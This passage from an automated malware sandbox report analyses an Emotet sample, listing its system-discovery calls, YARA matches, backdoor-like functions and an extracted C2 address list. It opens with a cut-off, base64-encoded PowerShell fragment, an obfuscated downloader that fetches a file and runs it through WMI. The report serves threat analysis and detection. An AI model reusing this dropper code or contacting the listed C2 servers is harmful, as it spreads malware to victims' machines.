gBzAFAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAbwBwAHoAbwBzAGEAaQB3AHEAPQAnAE4AbQBtAGYAawB5AHIAaABzAGUAaABuAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAZwBvAGgAawBzAG8AZgBpAGEAIABpAG4AIAAkAE0AbgB0AGMAcgB0AGUAcABpACkAewB0AHIAeQB7ACQAWABxAGkAcgB6AHEAZQBuAC4AIgBkAG8AdwBgAE4AYABsAE8AYQBgAGQARgBJAGwAZQAiACgAJABWAGcAbwBoAGsAcwBvAGYAaQBhACwAIAAkAFcAagBlAHcAdgBhAGQAcQB5AG0AcAB3ACkAOwAkAEMAeQBsAHgAagBqAGwAZABkAGUAZgBjAD0AJwBaAHYAdQBxAHUAawByAHAAeQBrAHYAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABXAGoAZQB3AHYAYQBkAHEAeQBtAHAAdwApAC4AIgBsAGAARQBuAGcAVABoACIAIAAtAGcAZQAgADMAMwA2ADIANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAGAAZQBgAEEAVABlACIAKAAkAFcAagBlAHcAdgBhAGQAcQB5AG0AcAB3ACkAOwAkAFAAZwBjAHAAdABhAHgAawBsAHMAcgBwAD0AJwBJAGIAZgB3AHMAcABzAGkAbgB3ACcAOwBiAHIAZQBhAGsAOwAkAEEAbgB6AGEAYwBzAHkAcwBvAHgAPQAnAEkAeQB0AHAAawBiAHkAZQBpAGkAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZAHoAdgBiAGgAcwBmAHoAagA9ACcASwBsAHEAegByAGoAdQBrAHkAcAAnAA==

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\209.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,3_2_00414177
Source: C:\Users\user\209.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_004565B2
Source: C:\Users\user\209.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,3_2_0045872B
Source: C:\Users\user\209.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_00458842
Source: C:\Users\user\209.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,3_2_004588DA
Source: C:\Users\user\209.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0045894E
Source: C:\Users\user\209.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_00458B20
Source: C:\Users\user\209.exeCode function: _strlen,EnumSystemLocalesA,3_2_00458BE4
Source: C:\Users\user\209.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,3_2_00456C53
Source: C:\Users\user\209.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_00458C74
Source: C:\Users\user\209.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_00458C0D
Source: C:\Users\user\209.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,3_2_00458CB0
Source: C:\Users\user\209.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,3_2_00456EDE
Source: C:\Users\user\209.exeCode function: GetLocaleInfoW,3_2_0045AF08
Source: C:\Users\user\209.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,3_2_0044AF15
Source: C:\Users\user\209.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,3_2_0045AF21
Source: C:\Users\user\209.exeCode function: GetLocaleInfoA,3_2_00458FB0
Source: C:\Users\user\209.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,3_2_004571A4
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\209.exeCode function: 3_2_003CE567 cpuid 3_2_003CE567
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\209.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\dvbthunk.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\209.exeCode function: 3_2_0043A350 GetSystemTimeAsFileTime,__aulldiv,3_2_0043A350
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\209.exeCode function: 3_2_0044FF31 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_0044FF31
Contains functionality to query windows versionShow sources
Source: C:\Users\user\209.exeCode function: 3_2_00406428 _memset,GetVersionExA,3_2_00406428
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\209.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000003.00000002.972464060.003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1796189087.001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1004710586.00270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.1796204898.00211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.972440038.003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1005852312.003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1005720735.001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.1004759882.00391000.00000020.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\209.exeCode function: 3_2_0041007A __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,3_2_0041007A
Source: C:\Users\user\209.exeCode function: 3_2_0040EB5A CreateBindCtx,_wcslen,CoTaskMemFree,3_2_0040EB5A

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.55.179.121:8080", "45.55.179.121/juH7pVdg5"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet